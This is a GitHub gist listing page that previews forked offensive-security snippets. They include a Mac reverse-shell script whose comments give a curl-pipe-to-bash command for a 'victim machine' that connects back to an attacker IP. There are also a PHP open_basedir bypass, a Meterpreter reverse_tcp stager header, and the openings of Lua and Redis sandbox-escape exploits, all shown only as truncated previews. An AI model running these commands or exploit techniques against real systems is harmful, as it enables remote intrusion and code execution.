Skip to content

Instantly share code, notes, and snippets.

View wonderkun's full-sized avatar

wonderkun

536 followers · 310 following
View GitHub Profile
@wonderkun
wonderkun / unwxapkg.py
Created January 2, 2018 05:56 — forked from thedreamwork/unwxapkg.py
unpack wxapkg
#!/usr/bin/python
# usage python unwxapkg.py filename
import sys,os
import struct
class WxapkgFile:
nameLen = 0
name = ""
@wonderkun
wonderkun / reverse-shell.sh
Created June 14, 2018 04:00 — forked from mattes/reverse-shell.sh
Reverse Shell Mac
#!/usr/bin/env bash
# run `nc -nvl 80` on attacker machine first
# run `curl -Ls https://git.io/vXd2N | bash -s <attacker-ip> 80` on victim machine
# great commands to run:
# * curl http://discovermagazine.com/~/media/import/images/b/e/b/chimpmedia.jpg -o /tmp/monkey.jpg
# open /tmp/monkey.jpg
# * say hello
# * open http://lmgtfy.com/?q=how+to+lock+mac
# * ls
@wonderkun
wonderkun / chrome_install_headless.sh
Created August 13, 2019 06:43 — forked from Leotomas/chrome_install_headless.sh
Install Chrome headless on Ubuntu
export CHROME_BIN=/usr/bin/google-chrome
export DISPLAY=:99.0
sh -e /etc/init.d/xvfb start
sudo apt-get update
sudo apt-get install -y libappindicator1 fonts-liberation
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i google-chrome*.deb
@wonderkun
wonderkun / MoP.php
Created September 16, 2019 05:36 — forked from wupco/MoP.php
realworldctf
<?php
function bypass_open_basedir(){
if(!is_dir('/tmp/ab')){
mkdir('/tmp/ab');
}
chdir('/tmp/ab');
ini_set('open_basedir','..');
chdir('..');
chdir('..');
chdir('..');
@wonderkun
wonderkun / meterpreter_reverse_tcp_stager.asm
Created September 16, 2019 05:48 — forked from Dliv3/meterpreter_reverse_tcp_stager.asm
; reverse_tcp shellcode: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_recv.asm
; asm_block_api for windows x86: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/block_api.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
; hash算法&预定义好的各种函数的hash值: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py
; PE结构: https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format
;《0day安全:软件漏洞分析技术》92页
; https://blog.cob
@wonderkun
wonderkun / Exploiting Lua 5.1 on 32-bit Windows.md
Created October 13, 2019 09:13 — forked from corsix/Exploiting Lua 5.1 on 32-bit Windows.md

Exploiting Lua 5.1 on 32-bit Windows

The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevent bits of the Lua 5.1 virtual machine.

if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
  error("This generator requires a 32-bit version of Lua 5.1")
end

local function outer()
  local magic -- In bytecode, the stack slot corresponding to this local is changed
@wonderkun
wonderkun / redis-lua-linux-x86-poc.py
Created October 13, 2019 09:13 — forked from orangetw/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
@wonderkun
wonderkun / redis-lua-linux-x86-poc.py
Created October 13, 2019 09:13 — forked from c3c/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
@wonderkun
wonderkun / gist:cbddf55520776fea00375d4404eee476
Created November 5, 2020 14:04 — forked from idiom/gist:7bf970f704c2f5e9b2cec825ded91df6
Ida 7.4 Python 3 Error
`C:\Program Files\IDA Pro 7.4\python\3\idc.py:5121: SyntaxWarning: "is not" with a literal. Did you mean "!="?
if newtype is not '':`
--- FIX ---
To resolve the above error change line 5121 to
`if newtype is not None:`
@wonderkun
wonderkun / RootHelper.x.c
Created July 22, 2021 02:44 — forked from NullArray/RootHelper.x.c
RootHelper Obfuscated, Encrypted, Converted to C source
//#____ ____ __
//#\ \ / /____ _____/ |_ ___________
//# \ Y // __ \_/ ___\ __\/ _ \_ __ \
//# \ /\ ___/\ \___| | ( <_> ) | \/
//# \___/ \___ >\___ >__| \____/|__|
//# \/ \/
//#--Licensed under GNU GPL 3
//#----Authored by Vector/NullArray
//###############################################